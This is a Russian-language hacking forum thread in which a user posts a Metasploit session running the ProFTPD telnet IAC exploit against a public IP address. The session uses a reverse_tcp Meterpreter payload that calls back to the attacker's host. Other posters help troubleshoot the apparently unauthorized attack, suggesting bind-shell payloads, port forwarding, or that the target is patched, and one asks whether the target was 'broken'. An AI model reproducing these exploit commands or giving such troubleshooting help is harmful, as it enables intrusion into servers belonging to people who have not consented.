Metasploit

Discussion in 'Песочница' started by nike001, 14 Mar 2014.

  1. nike001

    nike001 New Member

    Joined:
    19 Jan 2014
    Messages:
    17
    Likes Received:
    0
    Reputations:
    0
    Что не так?
    Code:
    msf > use linux/ftp/proftp_telnet_iac 
    msf  exploit(proftp_telnet_iac) > set RHOST 213.239.235.179 
    RHOST => 213.239.235.179 
    msf  exploit(proftp_telnet_iac) > set RPORT 21 
    RPORT => 21 
    msf  exploit(proftp_telnet_iac) > set TARGET 0 
    TARGET => 0 
    msf  exploit(proftp_telnet_iac) > set PAYLOAD linux/x86/meterpreter/reverse_tcp PAYLOAD => linux/x86/meterpreter/reverse_tcp 
    msf  exploit(proftp_telnet_iac) > set LHOST 192.168.1.4 
    LHOST => 192.168.1.4 
    msf  exploit(proftp_telnet_iac) > exploit
    [*] Started reverse handler on 192.168.1.4:4444
    [*] Automatically detecting the target... 
    [*] FTP Banner: 220 ProFTPD 1.3.3a Server (Debian) [::ffff:213.239.235.179]
    [*] Selected Target: ProFTPD 1.3.3a Server (Debian) - Squeeze Beta1 
    msf  exploit(proftp_telnet_iac) >
    
    И всё(( :confused:
     
  2. madhatter

    madhatter Member

    Joined:
    7 Aug 2013
    Messages:
    562
    Likes Received:
    50
    Reputations:
    54
    Вам точно нужен reverse-tcp? По возможности используется что-то более прямое.

    По вероятности:
    1) Целевая версия таки не уязвима
    2) Цель уязвима, но не может законнектиться к вам.
     
  3. nike001

    nike001 New Member

    Joined:
    19 Jan 2014
    Messages:
    17
    Likes Received:
    0
    Reputations:
    0
    Нет, версия точно уязвима(если не пропатчена конечно,в чем я сомневаюсь), и есть ли спобоб исправить пункт 2?
    Спасибо.
     
  4. madhatter

    madhatter Member

    Joined:
    7 Aug 2013
    Messages:
    562
    Likes Received:
    50
    Reputations:
    54
    Судя по баннеру, да, уязвима. Но баннер - это всего лишь баннер.

    Насколько я помню, в этом сплойте нет ограничений на тип пейлоада, поэтому используйте любой другой из доступных, где цели не нужно коннектиться к вам.
     
    1 person likes this.
  5. nike001

    nike001 New Member

    Joined:
    19 Jan 2014
    Messages:
    17
    Likes Received:
    0
    Reputations:
    0
    Спасибо. Хоть кто-то здесь разбирается не только в скулях и xss-ках.
     
  6. madhatter

    madhatter Member

    Joined:
    7 Aug 2013
    Messages:
    562
    Likes Received:
    50
    Reputations:
    54
    Np. Так вы расскажите, поломалась цель?
     
  7. nike001

    nike001 New Member

    Joined:
    19 Jan 2014
    Messages:
    17
    Likes Received:
    0
    Reputations:
    0
    Сейчас буду пробовать. Позже отпишусь.
     
  8. nike001

    nike001 New Member

    Joined:
    19 Jan 2014
    Messages:
    17
    Likes Received:
    0
    Reputations:
    0
    И shell_bind_tcp, и bind_tcp тоже не работают.
    P.S. Если есть у кого киньте ссылку про payloads(виды, и для чего каждый служит)
     
  9. infoseller

    infoseller Member

    Joined:
    17 Aug 2011
    Messages:
    136
    Likes Received:
    13
    Reputations:
    0
    А хэндлер-то запущен? и должен быть проброс в локалку...
     
  10. VY_CMa

    VY_CMa Green member

    Joined:
    6 Jan 2012
    Messages:
    917
    Likes Received:
    492
    Reputations:
    724
    За все время ни одного хоста с рабочей багой не попадалось, остается собирать на локалке и проверять. 2ТС, скорее всего патченная.
     
    _________________________
  11. nike001

    nike001 New Member

    Joined:
    19 Jan 2014
    Messages:
    17
    Likes Received:
    0
    Reputations:
    0
    Code:
    Started reverse handler on 192.168.1.4:4444
    
    Ну на сколько я понимаю хэндлер запущен и проброс в локалку тоже есть.
    После того как я запускаю сплойт появляется вот эта строка
    Code:
    msf  exploit(proftp_telnet_iac) >
    
    и консоль зависает, т.е. ничего нельзя ввести, Ctrl+c и Ctrl+x ничего не работает.
     
    #11 nike001, 15 Mar 2014
    Last edited: 15 Mar 2014
  12. nike001

    nike001 New Member

    Joined:
    19 Jan 2014
    Messages:
    17
    Likes Received:
    0
    Reputations:
    0
    Никто что ли не знает, почему не работает?
     
  13. Leo2016

    Leo2016 New Member

    Joined:
    24 Jan 2016
    Messages:
    15
    Likes Received:
    2
    Reputations:
    0
    Вижу шаришь))Помоги разобраться.Проблема в том что эксплоит требует опцию RHOST в основном это IP но при вводе пишет (Auxiliary failed: Msf::OptionValidateError The following options failed to validate: RHOSTS ) опция RHOST (The target address range or CIDR identifier) cпасиб за ранее.
     
  14. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,114
    Likes Received:
    830
    Reputations:
    231
    Будьте внимательнее в следующий раз , ошибка новичков там написано RHOSTS а не RHOST
    http://www.blackmoreops.com/2014/01...-following-options-failed-to-validate-rhosts/
     
    _________________________
    Leo2016 likes this.
  15. Leo2016

    Leo2016 New Member

    Joined:
    24 Jan 2016
    Messages:
    15
    Likes Received:
    2
    Reputations:
    0
  16. nikbim96

    nikbim96 Member

    Joined:
    16 Jan 2014
    Messages:
    112
    Likes Received:
    22
    Reputations:
    1
    Ты ломаешь его в локальной сети?
     
Loading...
Similar Threads - Metasploit
  1. Dobi768
    Replies:
    14
    Views:
    4,423
  2. Dobi768
    Replies:
    20
    Views:
    5,198